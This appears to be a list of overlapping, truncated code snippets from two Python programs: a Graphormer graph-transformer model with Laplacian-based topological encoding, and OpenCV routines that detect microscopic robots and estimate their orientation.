"TransformerEncoderLayer(nn.Module): def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"): super(TransformerEncoderLayer, self).__init__() self.self_attn = nn.MultiheadAttention(d_model,",
"dim_feedforward=2048, dropout=0.1, activation=\"relu\"): super(TransformerEncoderLayer, self).__init__() self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout) self.linear1 = nn.Linear(d_model,",
"concatenate_encoding=True): super().__init__() self.d_model = d_model self.depth = depth self.nhead = nhead self.dim_feedforward =",
"= TopologicalEncoding(encoding_size) self.node_embedder = nn.Embedding(alphabet_size, d_model - encoding_size) else: self.node_embedder = nn.Embedding(alphabet_size, d_model)",
"= torch.cat((encoding, embedding.squeeze()), dim=-1) else: graphs.ndata['h'] = encoding + embedding.squeeze() batch = []",
"src2 = self.linear2(self.dropout(self.activation(self.linear1(src)))) src = src + self.dropout2(src2) src = self.norm2(src) return src,",
"as np from scipy.linalg import eig class TopologicalEncoding(): def __init__(self, encoding_size=50): self.encoding_size =",
"w, V = eig(L) momenta = np.dot(L, V) clipping = self.encoding_size - graph.num_nodes()",
"+ embedding.squeeze() batch = [] for g in dgl.unbatch(graphs): batch.append(g.ndata['h']) h = torch.nn.utils.rnn.pad_sequence(batch)",
"batch = [] for g in dgl.unbatch(graphs): batch.append(g.ndata['h']) h = torch.nn.utils.rnn.pad_sequence(batch) attentions_ =",
"d_model) self.encoder = TopologicalEncoding(d_model) self.blocks = nn.ModuleList([TransformerEncoderLayer(d_model=d_model, nhead=nhead, dim_feedforward=self.dim_feedforward) for _ in range(depth)])",
"= [h[:num_nodes, i, :] for i, num_nodes in enumerate(graphs.batch_num_nodes())] h = torch.cat(truncated, dim=0)",
"= block(h) if need_weights: attentions_.append(att_) truncated = [h[:num_nodes, i, :] for i, num_nodes",
"else: self.node_embedder = nn.Embedding(alphabet_size, d_model) self.encoder = TopologicalEncoding(d_model) self.blocks = nn.ModuleList([TransformerEncoderLayer(d_model=d_model, nhead=nhead, dim_feedforward=self.dim_feedforward)",
"= self.norm2(src) return src, scores class Graphormer(nn.Module): def __init__(self, d_model=128, depth=5, nhead=8, expansion_factor=2,",
"if clipping > 0: momenta_ = [] for momentum in momenta: momenta_.append(np.pad(momentum, (0,",
"= nn.MultiheadAttention(d_model, nhead, dropout=dropout) self.linear1 = nn.Linear(d_model, dim_feedforward) self.dropout = nn.Dropout(dropout) self.linear2 =",
"return src, scores class Graphormer(nn.Module): def __init__(self, d_model=128, depth=5, nhead=8, expansion_factor=2, alphabet_size=100, encoding_size=32,",
"in dgl.unbatch(graphs): batch.append(g.ndata['h']) h = torch.nn.utils.rnn.pad_sequence(batch) attentions_ = [] for block in self.blocks:",
"self.encoding_size - graph.num_nodes() if clipping > 0: momenta_ = [] for momentum in",
"F.relu super(TransformerEncoderLayer, self).__setstate__(state) def forward(self, src, src_mask=None, src_key_padding_mask=None): src2, scores = self.self_attn(src, src,",
"state: state['activation'] = F.relu super(TransformerEncoderLayer, self).__setstate__(state) def forward(self, src, src_mask=None, src_key_padding_mask=None): src2, scores",
"else: graphs.ndata['h'] = encoding + embedding.squeeze() batch = [] for g in dgl.unbatch(graphs):",
"d_model * expansion_factor self.concatenate_encoding = concatenate_encoding if concatenate_encoding: self.encoder = TopologicalEncoding(encoding_size) self.node_embedder =",
"torch.nn.functional as F import numpy as np from scipy.linalg import eig class TopologicalEncoding():",
"[] for momentum in momenta: momenta_.append(np.pad(momentum, (0, clipping))) momenta = np.array(momenta_) elif clipping",
"from scipy.linalg import eig class TopologicalEncoding(): def __init__(self, encoding_size=50): self.encoding_size = encoding_size def",
"graph.adjacency_matrix().to_dense() D = torch.diag(graph.in_degrees()) L = (D - A).numpy() w, V = eig(L)",
"nn.LayerNorm(d_model) self.dropout1 = nn.Dropout(dropout) self.dropout2 = nn.Dropout(dropout) self.activation = F.relu def __setstate__(self, state):",
"clipping > 0: momenta_ = [] for momentum in momenta: momenta_.append(np.pad(momentum, (0, clipping)))",
"super(TransformerEncoderLayer, self).__setstate__(state) def forward(self, src, src_mask=None, src_key_padding_mask=None): src2, scores = self.self_attn(src, src, src,",
"import torch import torch.nn as nn import torch.nn.functional as F import numpy as",
"torch.nn.utils.rnn.pad_sequence(batch) attentions_ = [] for block in self.blocks: h, att_ = block(h) if",
"momenta = np.array(momenta_) elif clipping < 0: momenta = momenta[:, :self.encoding_size] return torch.FloatTensor(np.real(momenta))",
"torch.FloatTensor(np.real(momenta)) class TransformerEncoderLayer(nn.Module): def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"): super(TransformerEncoderLayer, self).__init__() self.self_attn",
"= self.self_attn(src, src, src, attn_mask=src_mask, key_padding_mask=src_key_padding_mask) src = src + self.dropout1(src2) src =",
"= torch.cat([self.encoder.encode(graph) for graph in dgl.unbatch(graphs)], dim=0) embedding = self.node_embedder(graphs.ndata['atomic'].type(torch.long)) if self.concatenate_encoding: graphs.ndata['h']",
"self.norm1(src) src2 = self.linear2(self.dropout(self.activation(self.linear1(src)))) src = src + self.dropout2(src2) src = self.norm2(src) return",
"for block in self.blocks: h, att_ = block(h) if need_weights: attentions_.append(att_) truncated =",
"d_model) self.norm1 = nn.LayerNorm(d_model) self.norm2 = nn.LayerNorm(d_model) self.dropout1 = nn.Dropout(dropout) self.dropout2 = nn.Dropout(dropout)",
"concatenate_encoding: self.encoder = TopologicalEncoding(encoding_size) self.node_embedder = nn.Embedding(alphabet_size, d_model - encoding_size) else: self.node_embedder =",
"eig class TopologicalEncoding(): def __init__(self, encoding_size=50): self.encoding_size = encoding_size def encode(self, graph): A",
"block(h) if need_weights: attentions_.append(att_) truncated = [h[:num_nodes, i, :] for i, num_nodes in",
"import numpy as np from scipy.linalg import eig class TopologicalEncoding(): def __init__(self, encoding_size=50):",
"[h[:num_nodes, i, :] for i, num_nodes in enumerate(graphs.batch_num_nodes())] h = torch.cat(truncated, dim=0) if",
"self.concatenate_encoding = concatenate_encoding if concatenate_encoding: self.encoder = TopologicalEncoding(encoding_size) self.node_embedder = nn.Embedding(alphabet_size, d_model -",
"nn.Dropout(dropout) self.dropout2 = nn.Dropout(dropout) self.activation = F.relu def __setstate__(self, state): if 'activation' not",
"momenta_ = [] for momentum in momenta: momenta_.append(np.pad(momentum, (0, clipping))) momenta = np.array(momenta_)",
"= F.relu super(TransformerEncoderLayer, self).__setstate__(state) def forward(self, src, src_mask=None, src_key_padding_mask=None): src2, scores = self.self_attn(src,",
"in dgl.unbatch(graphs)], dim=0) embedding = self.node_embedder(graphs.ndata['atomic'].type(torch.long)) if self.concatenate_encoding: graphs.ndata['h'] = torch.cat((encoding, embedding.squeeze()), dim=-1)",
"dgl import torch import torch.nn as nn import torch.nn.functional as F import numpy",
"graph.num_nodes() if clipping > 0: momenta_ = [] for momentum in momenta: momenta_.append(np.pad(momentum,",
"self.dim_feedforward = d_model * expansion_factor self.concatenate_encoding = concatenate_encoding if concatenate_encoding: self.encoder = TopologicalEncoding(encoding_size)",
"= F.relu def __setstate__(self, state): if 'activation' not in state: state['activation'] = F.relu",
":self.encoding_size] return torch.FloatTensor(np.real(momenta)) class TransformerEncoderLayer(nn.Module): def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"): super(TransformerEncoderLayer,",
"dim=-1) else: graphs.ndata['h'] = encoding + embedding.squeeze() batch = [] for g in",
"nn.Linear(dim_feedforward, d_model) self.norm1 = nn.LayerNorm(d_model) self.norm2 = nn.LayerNorm(d_model) self.dropout1 = nn.Dropout(dropout) self.dropout2 =",
"expansion_factor self.concatenate_encoding = concatenate_encoding if concatenate_encoding: self.encoder = TopologicalEncoding(encoding_size) self.node_embedder = nn.Embedding(alphabet_size, d_model",
"as F import numpy as np from scipy.linalg import eig class TopologicalEncoding(): def",
"[] for block in self.blocks: h, att_ = block(h) if need_weights: attentions_.append(att_) truncated",
"self.blocks: h, att_ = block(h) if need_weights: attentions_.append(att_) truncated = [h[:num_nodes, i, :]",
"for i, num_nodes in enumerate(graphs.batch_num_nodes())] h = torch.cat(truncated, dim=0) if need_weights: return h,",
"src, scores class Graphormer(nn.Module): def __init__(self, d_model=128, depth=5, nhead=8, expansion_factor=2, alphabet_size=100, encoding_size=32, device='cpu',",
"nn.ModuleList([TransformerEncoderLayer(d_model=d_model, nhead=nhead, dim_feedforward=self.dim_feedforward) for _ in range(depth)]) def forward(self, graphs, need_weights=False): encoding =",
"> 0: momenta_ = [] for momentum in momenta: momenta_.append(np.pad(momentum, (0, clipping))) momenta",
"= nn.Linear(dim_feedforward, d_model) self.norm1 = nn.LayerNorm(d_model) self.norm2 = nn.LayerNorm(d_model) self.dropout1 = nn.Dropout(dropout) self.dropout2",
"(0, clipping))) momenta = np.array(momenta_) elif clipping < 0: momenta = momenta[:, :self.encoding_size]",
"if 'activation' not in state: state['activation'] = F.relu super(TransformerEncoderLayer, self).__setstate__(state) def forward(self, src,",
"_ in range(depth)]) def forward(self, graphs, need_weights=False): encoding = torch.cat([self.encoder.encode(graph) for graph in",
"super().__init__() self.d_model = d_model self.depth = depth self.nhead = nhead self.dim_feedforward = d_model",
"embedding = self.node_embedder(graphs.ndata['atomic'].type(torch.long)) if self.concatenate_encoding: graphs.ndata['h'] = torch.cat((encoding, embedding.squeeze()), dim=-1) else: graphs.ndata['h'] =",
"self.norm2 = nn.LayerNorm(d_model) self.dropout1 = nn.Dropout(dropout) self.dropout2 = nn.Dropout(dropout) self.activation = F.relu def",
"= eig(L) momenta = np.dot(L, V) clipping = self.encoding_size - graph.num_nodes() if clipping",
"= self.node_embedder(graphs.ndata['atomic'].type(torch.long)) if self.concatenate_encoding: graphs.ndata['h'] = torch.cat((encoding, embedding.squeeze()), dim=-1) else: graphs.ndata['h'] = encoding",
"if concatenate_encoding: self.encoder = TopologicalEncoding(encoding_size) self.node_embedder = nn.Embedding(alphabet_size, d_model - encoding_size) else: self.node_embedder",
"d_model=128, depth=5, nhead=8, expansion_factor=2, alphabet_size=100, encoding_size=32, device='cpu', concatenate_encoding=True): super().__init__() self.d_model = d_model self.depth",
"self.linear1 = nn.Linear(d_model, dim_feedforward) self.dropout = nn.Dropout(dropout) self.linear2 = nn.Linear(dim_feedforward, d_model) self.norm1 =",
"self).__setstate__(state) def forward(self, src, src_mask=None, src_key_padding_mask=None): src2, scores = self.self_attn(src, src, src, attn_mask=src_mask,",
"nn.Linear(d_model, dim_feedforward) self.dropout = nn.Dropout(dropout) self.linear2 = nn.Linear(dim_feedforward, d_model) self.norm1 = nn.LayerNorm(d_model) self.norm2",
"+ self.dropout1(src2) src = self.norm1(src) src2 = self.linear2(self.dropout(self.activation(self.linear1(src)))) src = src + self.dropout2(src2)",
"= concatenate_encoding if concatenate_encoding: self.encoder = TopologicalEncoding(encoding_size) self.node_embedder = nn.Embedding(alphabet_size, d_model - encoding_size)",
"= nn.Linear(d_model, dim_feedforward) self.dropout = nn.Dropout(dropout) self.linear2 = nn.Linear(dim_feedforward, d_model) self.norm1 = nn.LayerNorm(d_model)",
"= graph.adjacency_matrix().to_dense() D = torch.diag(graph.in_degrees()) L = (D - A).numpy() w, V =",
"- encoding_size) else: self.node_embedder = nn.Embedding(alphabet_size, d_model) self.encoder = TopologicalEncoding(d_model) self.blocks = nn.ModuleList([TransformerEncoderLayer(d_model=d_model,",
"self.linear2 = nn.Linear(dim_feedforward, d_model) self.norm1 = nn.LayerNorm(d_model) self.norm2 = nn.LayerNorm(d_model) self.dropout1 = nn.Dropout(dropout)",
"self.blocks = nn.ModuleList([TransformerEncoderLayer(d_model=d_model, nhead=nhead, dim_feedforward=self.dim_feedforward) for _ in range(depth)]) def forward(self, graphs, need_weights=False):",
"+ self.dropout2(src2) src = self.norm2(src) return src, scores class Graphormer(nn.Module): def __init__(self, d_model=128,",
"return torch.FloatTensor(np.real(momenta)) class TransformerEncoderLayer(nn.Module): def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"): super(TransformerEncoderLayer, self).__init__()",
"= d_model * expansion_factor self.concatenate_encoding = concatenate_encoding if concatenate_encoding: self.encoder = TopologicalEncoding(encoding_size) self.node_embedder",
"embedding.squeeze() batch = [] for g in dgl.unbatch(graphs): batch.append(g.ndata['h']) h = torch.nn.utils.rnn.pad_sequence(batch) attentions_",
"if self.concatenate_encoding: graphs.ndata['h'] = torch.cat((encoding, embedding.squeeze()), dim=-1) else: graphs.ndata['h'] = encoding + embedding.squeeze()",
"num_nodes in enumerate(graphs.batch_num_nodes())] h = torch.cat(truncated, dim=0) if need_weights: return h, attentions_ return",
"momenta: momenta_.append(np.pad(momentum, (0, clipping))) momenta = np.array(momenta_) elif clipping < 0: momenta ="
] |
[
"= cv2.drawContours(np.copy(robot_control_mask), large_contours, -1, 1, -1) # probably needs more adjustment in the",
"robot_angles.append(angle) return contours_towards_center, robot_angles def get_robot_control(img, objective): detected = detect(img) large_contours = get_large_contours(detected)",
"img = cv2.convertScaleAbs(img, 1, 1.5) structure = np.ones((3, 3)) canny = np.copy(cv2.Canny(img, 20,",
"numpy as np def detect(img): # finds and fills the located robots img",
"structure) contours, hier = cv2.findContours(dilated, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) filled = cv2.drawContours(np.zeros(img.shape, dtype=np.uint8), contours, -1,",
"robot_control_mask = np.zeros(detect.shape) large_contour_image = cv2.drawContours(np.copy(robot_control_mask), large_contours, -1, 1, -1) # probably needs",
"> contour_range_border_limit) and np.all( xs < large_contour_image.shape[0] - contour_range_border_limit): if np.all(ys > contour_range_border_limit)",
"contour_range_border_limit): if np.all(ys > contour_range_border_limit) and np.all( ys < large_contour_image.shape[0] - contour_range_border_limit): contours_in_limits.append(contour)",
"cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) filled = cv2.drawContours(np.zeros(img.shape, dtype=np.uint8), contours, -1, 1, -1, 0, hier, 1)",
"circles contours, hier = cv2.findContours(detect, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) large_contours = [] contour_area_minimum = 2000",
"= [] contour_area_minimum = 2000 for c in contours: if cv2.contourArea(c) > contour_area_minimum:",
"= cv2.convertScaleAbs(img, 1, 1.5) structure = np.ones((3, 3)) canny = np.copy(cv2.Canny(img, 20, 120))",
"# finds and fills the located robots img = cv2.convertScaleAbs(img, 1, 1.5) structure",
"memory robot_control_mask = np.zeros(detect.shape) large_contour_image = cv2.drawContours(np.copy(robot_control_mask), large_contours, -1, 1, -1) # probably",
"make a dict for now objective_calibration_dict = {'2x': 4, '4x': 2, '10x': 1,",
"located robots img = cv2.convertScaleAbs(img, 1, 1.5) structure = np.ones((3, 3)) canny =",
"'20x': 1, '40x': 1} robot_angles = [] contours_towards_center = [] contour_range_border_limit = 100",
"[] for contour in large_contours: xs = np.squeeze(contour)[:, 0] ys = np.squeeze(contour)[:, 1]",
"ys < large_contour_image.shape[0] - contour_range_border_limit): contours_in_limits.append(contour) M = cv2.moments(contour) cx = int(M[\"m10\"] /",
"np.zeros(detect.shape) large_contour_image = cv2.drawContours(np.copy(robot_control_mask), large_contours, -1, 1, -1) # probably needs more adjustment",
"large_contour_image = cv2.drawContours(np.copy(robot_control_mask), large_contours, -1, 1, -1) # probably needs more adjustment in",
"return np.nanmean(np.where(val == 0, bin_centers, np.nan)) def get_robots(large_contours, detect, objective): # get memory",
"ys = np.squeeze(contour)[:, 1] # check that our contours are within acceptable limits,",
"1, -1, 0, hier, 1) return np.copy(filled) def get_large_contours(detect): # take a detection",
"cv2.convertScaleAbs(img, 1, 1.5) structure = np.ones((3, 3)) canny = np.copy(cv2.Canny(img, 20, 120)) dilated",
"** 2) val, bin_edges = np.histogram(theta, bins=50, range=[-np.pi, np.pi]) bin_centers = bin_edges[:-1] +",
"import numpy as np def detect(img): # finds and fills the located robots",
"/ M[\"m00\"]) cy = int(M[\"m01\"] / M[\"m00\"]) contours_towards_center.append(contour) angle = get_robot_angle(contour, (cx, cy))",
"cv2.findContours(dilated, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) filled = cv2.drawContours(np.zeros(img.shape, dtype=np.uint8), contours, -1, 1, -1, 0, hier,",
"= np.copy(cv2.Canny(img, 20, 120)) dilated = cv2.dilate(canny, structure) contours, hier = cv2.findContours(dilated, cv2.RETR_TREE,",
"structure = np.ones((3, 3)) canny = np.copy(cv2.Canny(img, 20, 120)) dilated = cv2.dilate(canny, structure)",
"np.pi]) bin_centers = bin_edges[:-1] + np.diff(bin_edges) / 2 return np.nanmean(np.where(val == 0, bin_centers,",
"so will make a dict for now objective_calibration_dict = {'2x': 4, '4x': 2,",
"1) return np.copy(filled) def get_large_contours(detect): # take a detection mask, and contour information",
"return contours_towards_center, robot_angles def get_robot_control(img, objective): detected = detect(img) large_contours = get_large_contours(detected) robots,",
"-1, 0, hier, 1) return np.copy(filled) def get_large_contours(detect): # take a detection mask,",
"robot_angles = [] contours_towards_center = [] contour_range_border_limit = 100 * objective_calibration_dict[objective] contours_in_limits =",
"1] # check that our contours are within acceptable limits, draw their circle",
"4, '4x': 2, '10x': 1, '20x': 1, '40x': 1} robot_angles = [] contours_towards_center",
"and np.all( ys < large_contour_image.shape[0] - contour_range_border_limit): contours_in_limits.append(contour) M = cv2.moments(contour) cx =",
"contour_range_border_limit) and np.all( xs < large_contour_image.shape[0] - contour_range_border_limit): if np.all(ys > contour_range_border_limit) and",
"M = cv2.moments(contour) cx = int(M[\"m10\"] / M[\"m00\"]) cy = int(M[\"m01\"] / M[\"m00\"])",
"1.5) structure = np.ones((3, 3)) canny = np.copy(cv2.Canny(img, 20, 120)) dilated = cv2.dilate(canny,",
"more adjustment in the future, so will make a dict for now objective_calibration_dict",
"= np.ones((3, 3)) canny = np.copy(cv2.Canny(img, 20, 120)) dilated = cv2.dilate(canny, structure) contours,",
"np.copy(filled) def get_large_contours(detect): # take a detection mask, and contour information add circles",
"1, 1.5) structure = np.ones((3, 3)) canny = np.copy(cv2.Canny(img, 20, 120)) dilated =",
"1, '40x': 1} robot_angles = [] contours_towards_center = [] contour_range_border_limit = 100 *",
"bin_edges[:-1] + np.diff(bin_edges) / 2 return np.nanmean(np.where(val == 0, bin_centers, np.nan)) def get_robots(large_contours,",
"import cv2 import numpy as np def detect(img): # finds and fills the",
"are if np.all(xs > contour_range_border_limit) and np.all( xs < large_contour_image.shape[0] - contour_range_border_limit): if",
"robot_angles def get_robot_control(img, objective): detected = detect(img) large_contours = get_large_contours(detected) robots, robot_angles =",
"that our contours are within acceptable limits, draw their circle if they are",
"fills the located robots img = cv2.convertScaleAbs(img, 1, 1.5) structure = np.ones((3, 3))",
"cv2.contourArea(c) > contour_area_minimum: large_contours.append(c) return large_contours def get_robot_angle(contour, center): contour = np.squeeze(np.copy(contour)) contour",
"np.squeeze(contour)[:, 1] # check that our contours are within acceptable limits, draw their",
"-1, 1, -1, 0, hier, 1) return np.copy(filled) def get_large_contours(detect): # take a",
"circle if they are if np.all(xs > contour_range_border_limit) and np.all( xs < large_contour_image.shape[0]",
"np.all( ys < large_contour_image.shape[0] - contour_range_border_limit): contours_in_limits.append(contour) M = cv2.moments(contour) cx = int(M[\"m10\"]",
"will make a dict for now objective_calibration_dict = {'2x': 4, '4x': 2, '10x':",
"= int(M[\"m01\"] / M[\"m00\"]) contours_towards_center.append(contour) angle = get_robot_angle(contour, (cx, cy)) robot_angles.append(angle) return contours_towards_center,",
"canny = np.copy(cv2.Canny(img, 20, 120)) dilated = cv2.dilate(canny, structure) contours, hier = cv2.findContours(dilated,",
"= [] for contour in large_contours: xs = np.squeeze(contour)[:, 0] ys = np.squeeze(contour)[:,",
"# rho = np.sqrt(contour[:, 0] ** 2 + contour[:, 1] ** 2) val,",
"np.copy(cv2.Canny(img, 20, 120)) dilated = cv2.dilate(canny, structure) contours, hier = cv2.findContours(dilated, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)",
"[] contour_area_minimum = 2000 for c in contours: if cv2.contourArea(c) > contour_area_minimum: large_contours.append(c)",
"objective_calibration_dict = {'2x': 4, '4x': 2, '10x': 1, '20x': 1, '40x': 1} robot_angles",
"* objective_calibration_dict[objective] contours_in_limits = [] for contour in large_contours: xs = np.squeeze(contour)[:, 0]",
"c in contours: if cv2.contourArea(c) > contour_area_minimum: large_contours.append(c) return large_contours def get_robot_angle(contour, center):",
"np.squeeze(np.copy(contour)) contour -= center theta = np.arctan2(contour[:, 1], contour[:, 0]) # rho =",
"np.arctan2(contour[:, 1], contour[:, 0]) # rho = np.sqrt(contour[:, 0] ** 2 + contour[:,",
"np.histogram(theta, bins=50, range=[-np.pi, np.pi]) bin_centers = bin_edges[:-1] + np.diff(bin_edges) / 2 return np.nanmean(np.where(val",
"cx = int(M[\"m10\"] / M[\"m00\"]) cy = int(M[\"m01\"] / M[\"m00\"]) contours_towards_center.append(contour) angle =",
"np.nan)) def get_robots(large_contours, detect, objective): # get memory robot_control_mask = np.zeros(detect.shape) large_contour_image =",
"np.sqrt(contour[:, 0] ** 2 + contour[:, 1] ** 2) val, bin_edges = np.histogram(theta,",
"cy)) robot_angles.append(angle) return contours_towards_center, robot_angles def get_robot_control(img, objective): detected = detect(img) large_contours =",
"draw their circle if they are if np.all(xs > contour_range_border_limit) and np.all( xs",
"contour_range_border_limit) and np.all( ys < large_contour_image.shape[0] - contour_range_border_limit): contours_in_limits.append(contour) M = cv2.moments(contour) cx",
"contours are within acceptable limits, draw their circle if they are if np.all(xs",
"/ 2 return np.nanmean(np.where(val == 0, bin_centers, np.nan)) def get_robots(large_contours, detect, objective): #",
"cv2.CHAIN_APPROX_SIMPLE) filled = cv2.drawContours(np.zeros(img.shape, dtype=np.uint8), contours, -1, 1, -1, 0, hier, 1) return",
"contours, hier = cv2.findContours(detect, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) large_contours = [] contour_area_minimum = 2000 for",
"contours, hier = cv2.findContours(dilated, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) filled = cv2.drawContours(np.zeros(img.shape, dtype=np.uint8), contours, -1, 1,",
"the future, so will make a dict for now objective_calibration_dict = {'2x': 4,",
"= np.sqrt(contour[:, 0] ** 2 + contour[:, 1] ** 2) val, bin_edges =",
"** 2 + contour[:, 1] ** 2) val, bin_edges = np.histogram(theta, bins=50, range=[-np.pi,",
"bins=50, range=[-np.pi, np.pi]) bin_centers = bin_edges[:-1] + np.diff(bin_edges) / 2 return np.nanmean(np.where(val ==",
"= np.squeeze(np.copy(contour)) contour -= center theta = np.arctan2(contour[:, 1], contour[:, 0]) # rho",
"cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) large_contours = [] contour_area_minimum = 2000 for c in contours: if",
"dtype=np.uint8), contours, -1, 1, -1, 0, hier, 1) return np.copy(filled) def get_large_contours(detect): #",
"contour_area_minimum: large_contours.append(c) return large_contours def get_robot_angle(contour, center): contour = np.squeeze(np.copy(contour)) contour -= center",
"= int(M[\"m10\"] / M[\"m00\"]) cy = int(M[\"m01\"] / M[\"m00\"]) contours_towards_center.append(contour) angle = get_robot_angle(contour,",
"= cv2.findContours(detect, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) large_contours = [] contour_area_minimum = 2000 for c in",
"if cv2.contourArea(c) > contour_area_minimum: large_contours.append(c) return large_contours def get_robot_angle(contour, center): contour = np.squeeze(np.copy(contour))",
"def get_large_contours(detect): # take a detection mask, and contour information add circles contours,",
"objective): detected = detect(img) large_contours = get_large_contours(detected) robots, robot_angles = get_robots(large_contours, detected, objective)",
"theta = np.arctan2(contour[:, 1], contour[:, 0]) # rho = np.sqrt(contour[:, 0] ** 2",
"large_contours, -1, 1, -1) # probably needs more adjustment in the future, so",
"range=[-np.pi, np.pi]) bin_centers = bin_edges[:-1] + np.diff(bin_edges) / 2 return np.nanmean(np.where(val == 0,",
"dict for now objective_calibration_dict = {'2x': 4, '4x': 2, '10x': 1, '20x': 1,",
"-1, 1, -1) # probably needs more adjustment in the future, so will",
"= [] contours_towards_center = [] contour_range_border_limit = 100 * objective_calibration_dict[objective] contours_in_limits = []",
"contours_in_limits.append(contour) M = cv2.moments(contour) cx = int(M[\"m10\"] / M[\"m00\"]) cy = int(M[\"m01\"] /",
"bin_edges = np.histogram(theta, bins=50, range=[-np.pi, np.pi]) bin_centers = bin_edges[:-1] + np.diff(bin_edges) / 2",
"= get_robot_angle(contour, (cx, cy)) robot_angles.append(angle) return contours_towards_center, robot_angles def get_robot_control(img, objective): detected =",
"def get_robot_angle(contour, center): contour = np.squeeze(np.copy(contour)) contour -= center theta = np.arctan2(contour[:, 1],",
"xs < large_contour_image.shape[0] - contour_range_border_limit): if np.all(ys > contour_range_border_limit) and np.all( ys <",
"contours_towards_center, robot_angles def get_robot_control(img, objective): detected = detect(img) large_contours = get_large_contours(detected) robots, robot_angles",
"20, 120)) dilated = cv2.dilate(canny, structure) contours, hier = cv2.findContours(dilated, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) filled",
"cv2.drawContours(np.copy(robot_control_mask), large_contours, -1, 1, -1) # probably needs more adjustment in the future,",
"get_robot_angle(contour, center): contour = np.squeeze(np.copy(contour)) contour -= center theta = np.arctan2(contour[:, 1], contour[:,",
"< large_contour_image.shape[0] - contour_range_border_limit): if np.all(ys > contour_range_border_limit) and np.all( ys < large_contour_image.shape[0]",
"contour in large_contours: xs = np.squeeze(contour)[:, 0] ys = np.squeeze(contour)[:, 1] # check",
"take a detection mask, and contour information add circles contours, hier = cv2.findContours(detect,",
"detected = detect(img) large_contours = get_large_contours(detected) robots, robot_angles = get_robots(large_contours, detected, objective) return",
"if np.all(xs > contour_range_border_limit) and np.all( xs < large_contour_image.shape[0] - contour_range_border_limit): if np.all(ys",
"[] contours_towards_center = [] contour_range_border_limit = 100 * objective_calibration_dict[objective] contours_in_limits = [] for",
"= cv2.dilate(canny, structure) contours, hier = cv2.findContours(dilated, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) filled = cv2.drawContours(np.zeros(img.shape, dtype=np.uint8),",
"cv2.dilate(canny, structure) contours, hier = cv2.findContours(dilated, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) filled = cv2.drawContours(np.zeros(img.shape, dtype=np.uint8), contours,",
"> contour_area_minimum: large_contours.append(c) return large_contours def get_robot_angle(contour, center): contour = np.squeeze(np.copy(contour)) contour -=",
"np def detect(img): # finds and fills the located robots img = cv2.convertScaleAbs(img,",
"= np.arctan2(contour[:, 1], contour[:, 0]) # rho = np.sqrt(contour[:, 0] ** 2 +",
"probably needs more adjustment in the future, so will make a dict for",
"= 2000 for c in contours: if cv2.contourArea(c) > contour_area_minimum: large_contours.append(c) return large_contours",
"mask, and contour information add circles contours, hier = cv2.findContours(detect, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) large_contours",
"val, bin_edges = np.histogram(theta, bins=50, range=[-np.pi, np.pi]) bin_centers = bin_edges[:-1] + np.diff(bin_edges) /",
"cv2.moments(contour) cx = int(M[\"m10\"] / M[\"m00\"]) cy = int(M[\"m01\"] / M[\"m00\"]) contours_towards_center.append(contour) angle",
"int(M[\"m10\"] / M[\"m00\"]) cy = int(M[\"m01\"] / M[\"m00\"]) contours_towards_center.append(contour) angle = get_robot_angle(contour, (cx,",
"detect(img) large_contours = get_large_contours(detected) robots, robot_angles = get_robots(large_contours, detected, objective) return robots, robot_angles",
"center theta = np.arctan2(contour[:, 1], contour[:, 0]) # rho = np.sqrt(contour[:, 0] **",
"0] ys = np.squeeze(contour)[:, 1] # check that our contours are within acceptable",
"'40x': 1} robot_angles = [] contours_towards_center = [] contour_range_border_limit = 100 * objective_calibration_dict[objective]",
"now objective_calibration_dict = {'2x': 4, '4x': 2, '10x': 1, '20x': 1, '40x': 1}",
"0, hier, 1) return np.copy(filled) def get_large_contours(detect): # take a detection mask, and",
"contour[:, 0]) # rho = np.sqrt(contour[:, 0] ** 2 + contour[:, 1] **",
"get_robot_angle(contour, (cx, cy)) robot_angles.append(angle) return contours_towards_center, robot_angles def get_robot_control(img, objective): detected = detect(img)",
"information add circles contours, hier = cv2.findContours(detect, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) large_contours = [] contour_area_minimum",
"future, so will make a dict for now objective_calibration_dict = {'2x': 4, '4x':",
"xs = np.squeeze(contour)[:, 0] ys = np.squeeze(contour)[:, 1] # check that our contours",
"and np.all( xs < large_contour_image.shape[0] - contour_range_border_limit): if np.all(ys > contour_range_border_limit) and np.all(",
"in the future, so will make a dict for now objective_calibration_dict = {'2x':",
"in large_contours: xs = np.squeeze(contour)[:, 0] ys = np.squeeze(contour)[:, 1] # check that",
"- contour_range_border_limit): if np.all(ys > contour_range_border_limit) and np.all( ys < large_contour_image.shape[0] - contour_range_border_limit):",
"contours_in_limits = [] for contour in large_contours: xs = np.squeeze(contour)[:, 0] ys =",
"0, bin_centers, np.nan)) def get_robots(large_contours, detect, objective): # get memory robot_control_mask = np.zeros(detect.shape)",
"and fills the located robots img = cv2.convertScaleAbs(img, 1, 1.5) structure = np.ones((3,",
"'4x': 2, '10x': 1, '20x': 1, '40x': 1} robot_angles = [] contours_towards_center =",
"needs more adjustment in the future, so will make a dict for now",
"large_contours.append(c) return large_contours def get_robot_angle(contour, center): contour = np.squeeze(np.copy(contour)) contour -= center theta",
"[] contour_range_border_limit = 100 * objective_calibration_dict[objective] contours_in_limits = [] for contour in large_contours:",
"== 0, bin_centers, np.nan)) def get_robots(large_contours, detect, objective): # get memory robot_control_mask =",
"for now objective_calibration_dict = {'2x': 4, '4x': 2, '10x': 1, '20x': 1, '40x':",
